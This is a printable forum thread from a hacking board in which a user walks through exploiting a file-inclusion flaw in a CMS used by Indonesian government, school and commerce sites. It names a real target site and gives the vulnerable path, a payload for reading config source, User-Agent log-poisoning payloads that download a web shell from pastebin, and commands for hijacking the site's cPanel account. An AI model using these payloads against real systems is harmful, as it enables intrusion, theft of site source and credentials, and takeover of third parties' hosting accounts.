DummiesHub
utilizing LFI bugs besides for RCE - Printable Version

+- DummiesHub (https://dummieshub.com)
+-- Forum: Cyber Security (https://dummieshub.com/forumdisplay.php?fid=6)
+--- Forum: 0day (https://dummieshub.com/forumdisplay.php?fid=30)
+--- Thread: utilizing LFI bugs besides for RCE (/showthread.php?tid=111)



utilizing LFI bugs besides for RCE - tikna - 10-28-2019

Hi all!

in this video I will share about LFI to RCE on WEB Image CMS
where this CMS has been used enough on websites in Indonesia such as government,
E-commerce, school and others.

You can see a list of websites that use this CMS at once to become
vuln website for LFI to RCE

link: https://citra.web.id/en/project.html

okay I already have one of the targets

Target: https://www.eureka.co.id/

here I will practice some techniques for utilizing LFI bugs besides
for RCE, that is, we can steal Source Code like Config and others
so please don't skipp this video unless you are a master wkwk

[+] LFI exploits:
/ system / ajax /? file

[+] Get file config with LFI
php: //filter/convert.base64-encode/resource=file

[+] Exploit RCE:

Step 1.
Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('wget https://pastebin.com/raw/yYJVNJqp -O x.php; ls -la')?>

// make sure the x.php file already exists

step 2.
Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('mv .htaccess .htacces')?>
// now we access the file x.php
// yups succeeded
// I will try to enter the code
// next we will get Get cpanel access


[+] Get Cpanel with RCE:

enter command

# wget https://pastebin.com/raw/HcwPV8hd -O.contactemail
# mv. contactemail ../
# mv ../.cpanel/contactinfo ../.cpanel/contactinfo2
// admeur07 this is the username for cpanel
// https://pastebin.com/raw/HcwPV8hd > the contents are e-mail to receive the code